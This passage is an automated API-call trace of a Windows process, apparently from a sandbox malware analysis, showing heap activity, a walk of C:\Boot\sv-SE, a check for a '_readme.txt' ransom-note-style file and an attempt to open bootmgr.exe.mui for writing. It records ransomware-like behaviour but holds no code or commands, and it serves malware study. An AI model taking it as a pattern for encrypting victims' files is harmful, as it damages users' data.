Size=0x860) returned 0x3268798 [0058.263] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3268798 | out: hHeap=0x660000) returned 1 [0058.263] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328e770 | out: hHeap=0x660000) returned 1 [0058.263] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328e770 [0058.263] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x820) returned 0x9c5d1d0 [0058.263] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0058.263] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328e770 | out: hHeap=0x660000) returned 1 [0058.263] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328e770 [0058.263] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x820) returned 0x9c5d1d0 [0058.263] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0058.263] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328e770 | out: hHeap=0x660000) returned 1 [0058.263] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328e770 [0058.263] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x830) returned 0x9c5d1d0 [0058.263] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xc46) returned 0x9c778e8 [0058.263] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0058.263] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c778e8 | out: hHeap=0x660000) returned 1 [0058.263] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328e770 | out: hHeap=0x660000) returned 1 [0058.263] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328e770 [0058.263] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x840) returned 0x9c5d1d0 [0058.263] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0058.263] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328e770 | out: hHeap=0x660000) returned 1 [0058.263] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328e770 [0058.263] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x830) returned 0x9c5d1d0 [0058.263] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0058.263] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328e770 | out: hHeap=0x660000) returned 1 [0058.263] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328e770 [0058.263] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x830) returned 0x9c5d1d0 [0058.263] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0058.263] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328e770 | out: hHeap=0x660000) returned 1 [0058.264] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328e770 [0058.264] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x830) returned 0x9c5d1d0 [0058.264] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0058.264] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328e770 | out: hHeap=0x660000) returned 1 [0058.264] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328e770 [0058.264] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x820) returned 0x9c5d1d0 [0058.264] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0058.264] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328e770 | out: hHeap=0x660000) returned 1 [0058.264] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328e770 [0058.264] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x820) returned 0x9c5d1d0 [0058.264] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0058.264] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328e770 | out: hHeap=0x660000) returned 1 [0058.264] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328e770 [0058.264] PathFindFileNameW (pszPath="C:\\Boot\\sv-SE\\") returned="sv-SE\\" [0058.264] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328ed88 [0058.264] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328e770 | out: hHeap=0x660000) returned 1 [0058.264] PathFindFileNameW (pszPath="C:\\Boot\\") returned="Boot\\" [0058.264] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328ed88 | out: hHeap=0x660000) returned 1 [0058.264] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0058.264] PathFindFileNameW (pszPath="") returned="" [0058.264] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328ed88 [0058.264] LoadLibraryW (lpLibFileName="Shell32.dll") returned 0x75fd0000 [0058.264] GetProcAddress (hModule=0x75fd0000, lpProcName="SHGetFolderPathW") returned 0x76055708 [0058.264] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x800) returned 0x3268798 [0058.265] SHGetFolderPathW (in: hwnd=0x0, csidl=40, hToken=0x0, dwFlags=0x0, pszPath=0x3268798 | out: pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz") returned 0x0 [0058.265] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x810) returned 0x9c5d1d0 [0058.265] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328e770 [0058.265] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0058.265] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328ebf8 [0058.265] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328ed88 | out: hHeap=0x660000) returned 1 [0058.265] FreeLibrary (hLibModule=0x75fd0000) returned 1 [0058.265] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328e770 | out: hHeap=0x660000) returned 1 [0058.265] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3268798 | out: hHeap=0x660000) returned 1 [0058.265] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328ebf8 | out: hHeap=0x660000) returned 1 [0058.265] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328ebf8 [0058.265] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x81c) returned 0x9c5d1d0 [0058.265] PathAppendW (in: pszPath="C:\\Boot\\sv-SE\\", pMore="_readme.txt" | out: pszPath="C:\\Boot\\sv-SE\\_readme.txt") returned 1 [0058.265] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x820) returned 0x9c5da58 [0058.265] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328ebf8 | out: hHeap=0x660000) returned 1 [0058.265] PathFileExistsW (pszPath="C:\\Boot\\sv-SE\\_readme.txt") returned 1 [0058.265] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0058.265] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328ebf8 [0058.265] FindFirstFileW (in: lpFileName="C:\\Boot\\sv-SE\\*", lpFindFileData=0x9f4fba4 | out: lpFindFileData=0x9f4fba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac0d3720, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0x1ec76650, ftLastAccessTime.dwHighDateTime=0x1d5956a, ftLastWriteTime.dwLowDateTime=0x1ec76650, ftLastWriteTime.dwHighDateTime=0x1d5956a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x68d798 [0058.265] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328ebf8 | out: hHeap=0x660000) returned 1 [0058.265] FindNextFileW (in: hFindFile=0x68d798, lpFindFileData=0x9f4fba4 | out: lpFindFileData=0x9f4fba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac0d3720, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0x1ec76650, ftLastAccessTime.dwHighDateTime=0x1d5956a, ftLastWriteTime.dwLowDateTime=0x1ec76650, ftLastWriteTime.dwHighDateTime=0x1d5956a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0058.265] FindNextFileW (in: hFindFile=0x68d798, lpFindFileData=0x9f4fba4 | out: lpFindFileData=0x9f4fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xac0d3720, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac0d3720, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xe868d5aa, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x15640, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 1 [0058.265] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328ebf8 [0058.265] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x40) returned 0x3216638 [0058.265] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328ebf8 | out: hHeap=0x660000) returned 1 [0058.265] PathFindExtensionW (pszPath="C:\\Boot\\sv-SE\\bootmgr.exe.mui") returned=".mui" [0058.266] CreateFileW (lpFileName="C:\\Boot\\sv-SE\\bootmgr.exe.mui" (normalized: "c:\\boot\\sv-se\\bootmgr.exe.mui"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0058.266] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3216638 | out: hHeap=0x660000) returned 1 [0058.266] FindNextFileW (in: hFindFile=0x68d798, lpFindFileData=0x9f4fba4 | out: lpFindFileData=0x9f4fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x1ec76650, ftCreationTime.dwHighDateTime=0x1d5956a, ftLastAccessTime.dwLowDateTime=0x1ec76650, ftLastAccessTime.dwHighDateTime=0x1d5956a, ftLastWriteTime.dwLowDateTime=0x1ec76650, ftLastWriteTime.dwHighDateTime=0x1d5956a, nFileSizeHigh=0x0, nFileSizeLow=0x45d, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="_readme.txt", cAlternateFileName="")) returned 1 [0058.266] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328ebf8 [0058.266] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x40) returned 0x3216638 [0058.266] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328ebf8 | out: hHeap=0x660000) returned 1 [0058.266] PathFindExtensionW (pszPath="C:\\Boot\\sv-SE\\_readme.txt") returned=".txt" [0058.266] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3216638 | out: hHeap=0x660000) returned 1 [0058.266] FindNextFileW (in: hFindFile=0x68d798, lpFindFileData=0x9f4fba4 | out: lpFindFileData=0x9f4fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x1ec76650, ftCreationTime.dwHighDateTime=0x1d5956a, ftLastAccessTime.dwLowDateTime=0x1ec76650, ftLastAccessTime.dwHighDateTime=0x1d5956a, ftLastWriteTime.dwLowDateTime=0x1ec76650, ftLastWriteTime.dwHighDateTime=0x1d5956a, nFileSizeHigh=0x0, nFileSizeLow=0x45d, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="_readme.txt", cAlternateFileName="")) returned 0 [0058.266] FindClose (in: hFindFile=0x68d798 | out: hFindFile=0x68d798) returned 1 [0058.266] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5da58 | out: hHeap=0x660000) returned 1 [0058.266] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328e950 | out: hHeap=0x660000) returned 1 [0058.266] PeekMessageW (in: lpMsg=0x9f4ff08, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x9f4ff08) returned 0 [0058.266] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328e950 [0058.266] PeekMessageW (in: lpMsg=0x9f4fb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x9f4fb74) returned 0 [0058.266] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328ebf8 [0058.266] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x820) returned 0x9c5da58 [0058.266] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5da58 | out: hHeap=0x660000) returned 1 [0058.266] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328ebf8 | out: hHeap=0x660000) returned 1 [0058.266] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328ebf8 [0058.266] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x830) returned 0x9c5da58 [0058.266] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5da58 | out: hHeap=0x660000) returned 1 [0058.266] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328ebf8 | out: hHeap=0x660000) returned 1 [0058.266] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328ebf8 [0058.266] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x830) returned 0x9c5da58 [0058.266] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5da58 | out: hHeap=0x660000) returned 1 [0058.266] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328ebf8 | out: hHeap=0x660000) returned 1 [0058.266] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328ebf8 [0058.266] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x830) returned 0x9c5da58 [0058.266] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5da58 | out: hHeap=0x660000) returned 1 [0058.266] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328ebf8 | out: hHeap=0x660000) returned 1 [0058.267] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328ebf8 [0058.267] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x830) returned 0x9c5da58 [0058.267] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5da58 | out: hHeap=0x660000) returned 1 [0058.267] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328ebf8 | out: hHeap=0x660000) returned 1 [0058.267] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328ebf8 [0058.267] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x840) returned 0x9c5da58 [0058.267] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5da58 | out: hHeap=0x660000) returned 1 [0058.267] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328ebf8 | out: hHeap=0x660000) returned 1 [0058.267] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328ebf8 [0058.267] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x820) returned 0x9c5da58 [0058.267] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xc2e) returned 0x9c778e8 [0058.267] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5da58 | out: hHeap=0x660000) returned 1 [0058.267] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c778e8 | out: hHeap=0x660000) returned 1 [0058.267] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328ebf8 | out: hHeap=0x660000) returned 1 [0058.267] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328ebf8 [0058.267] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x820) returned 0x9c5da58 [0058.267] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5da58 | out: hHeap=0x660000) returned 1 [0058.267] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328ebf8 | out: hHeap=0x660000) returned 1 [0058.267] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328ebf8 [0058.267] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x840) returned 0x9c5da58 [0058.267] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5da58 | out: hHeap=0x660000) returned 1 [0058.267] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328ebf8 | out: hHeap=0x660000) returned 1 [0058.267] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328ebf8 [0058.267] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x860) returned 0x3268798 [0058.267] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3268798 | out: hHeap=0x660000) returned 1 [0058.267] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328ebf8 | out: hHeap=0x660000) returned 1 [0058.267] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328ebf8 [0058.267] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x860) returned 0x3268798 [0058.267] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3268798 | out: hHeap=0x660000) returned 1 [0058.267] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328ebf8 | out: hHeap=0x660000) returned 1 [0058.267] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328ebf8 [0058.267] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x820) returned 0x9c5da58 [0058.267] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5da58 | out: hHeap=0x660000) returned 1 [0058.267] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328ebf8 | out: hHeap=0x660000) returned 1 [0058.267] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328ebf8 [0058.267] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x820) returned 0x9c5da58 [0058.268] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5da58 | out: hHeap=0x660000) returned 1 [0058.268] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328ebf8 | out: hHeap=0x660000) returned 1 [0058.268] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328ebf8 [0058.268] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x840) returned 0x9c5da58 [0058.268] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5da58 | out: hHeap=0x660000) returned 1 [0058.268] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328ebf8 | out: hHeap=0x660000) returned 1 [0058.268] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328ebf8 [0058.268] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x840) returned 0x9c5da58 [0058.268] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5da58 | out: hHeap=0x660000) returned 1 [0058.268] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328ebf8 | out: hHeap=0x660000) returned 1 [0058.268] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328ebf8 [0058.268] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x830) returned 0x9c5da58 [0058.268] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5da58 | out: hHeap=0x660000) returned 1 [0058.268] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328ebf8 | out: hHeap=0x660000) returned 1 [0058.268] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328ebf8 [0058.268] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x830) returned 0x9c5da58 [0058.268] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5da58 | out: hHeap=0x660000) returned 1 [0058.268] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328ebf8 | out: hHeap=0x660000) returned 1 [0058.268] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328ebf8 [0058.268] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x830) returned 0x9c5da58 [0058.268] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5da58 | out: hHeap=0x660000) returned 1 [0058.268] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328ebf8 | out: hHeap=0x660000) returned 1 [0058.268] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328ebf8 [0058.268] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x820) returned 0x9c5da58 [0058.268] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5da58 | out: hHeap=0x660000) returned 1 [0058.268] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328ebf8 | out: hHeap=0x660000) returned 1 [0058.268] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328ebf8 [0058.268] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x820) returned 0x9c5da58 [0058.268] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5da58 | out: hHeap=0x660000) returned 1 [0058.268] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328ebf8 | out: hHeap=0x660000) returned 1 [0058.268] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328ebf8 [0058.268] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x820) returned 0x9c5da58 [0058.268] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5da58 | out: hHeap=0x660000) returned 1 [0058.268] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328ebf8 | out: hHeap=0x660000) returned 1 [0058.268] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328ebf8 [0058.269] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x830) returned 0x9c5da58 [0058.269] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5da58 | out: hHeap=0x660000) returned 1 [0058.269] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328ebf8 | out: hHeap=0x660000) returned 1 [0058.269] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328ebf8 [0058.269] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x830) returned 0x9c5da58 [0058.269] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xc46) returned 0x9c778e8 [0058.269] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5da58 | out: hHeap=0x660000) returned 1 [0058.269] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c778e8 | out: hHeap=0x660000) returned 1 [0058.269] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328ebf8 | out: hHeap=0x660000) returned 1 [0058.269] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328ebf8 [0058.269] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x820) returned 0x9c5da58 [0058.269] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5da58 | out: hHeap=0x660000) returned 1 [0058.269] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328ebf8 | out: hHeap=0x660000) returned 1 [0058.269] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328ebf8 [0058.269] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x820) returned 0x9c5da58 [0058.269] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xc2e) returned 0x9c778e8 [0058.269] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5da58 | out: hHeap=0x660000) returned 1 [0058.269] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c778e8 | out: hHeap=0x660000) returned 1 [0058.269] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328ebf8 | out: hHeap=0x660000) returned 1 [0058.269] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328ebf8 [0058.269] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x860) returned 0x3268798 [0058.269] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3268798 | out: hHeap=0x660000) returned 1 [0058.269] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328ebf8 | out: hHeap=0x660000) returned 1 [0058.269] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328ebf8 [0058.269] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x860) returned 0x3268798 [0058.269] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3268798 | out: hHeap=0x660000) returned 1 [0058.269] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328ebf8 | out: hHeap=0x660000) returned 1 [0058.269] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328ebf8 [0058.269] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x820) returned 0x9c5da58 [0058.269] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5da58 | out: hHeap=0x660000) returned 1 [0058.269] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328ebf8 | out: hHeap=0x660000) returned 1 [0058.269] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328ebf8 [0058.269] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x820) returned 0x9c5da58 [0058.269] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5da58 | out: hHeap=0x660000) returned 1 [0058.269] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328ebf8 | out: hHeap=0x660000) returned 1 [0058.269] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328ebf8 [0058.270] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x830) returned 0x9c5da58 [0058.270] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xc46) returned 0x9c778e8 [0058.270] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5da58 | out: hHeap=0x660000) returned 1 [0058.270] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c778e8 | out: hHeap=0x660000) returned 1 [0058.270] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328ebf8 | out: hHeap=0x660000) returned 1 [0058.270] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328ebf8 [0058.270] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x840) returned 0x9c5da58 [0058.270] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5da58 | out: hHeap=0x660000) returned 1 [0058.270] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328ebf8 | out: hHeap=0x660000) returned 1 [0058.270] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328ebf8 [0058.270] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x840) returned 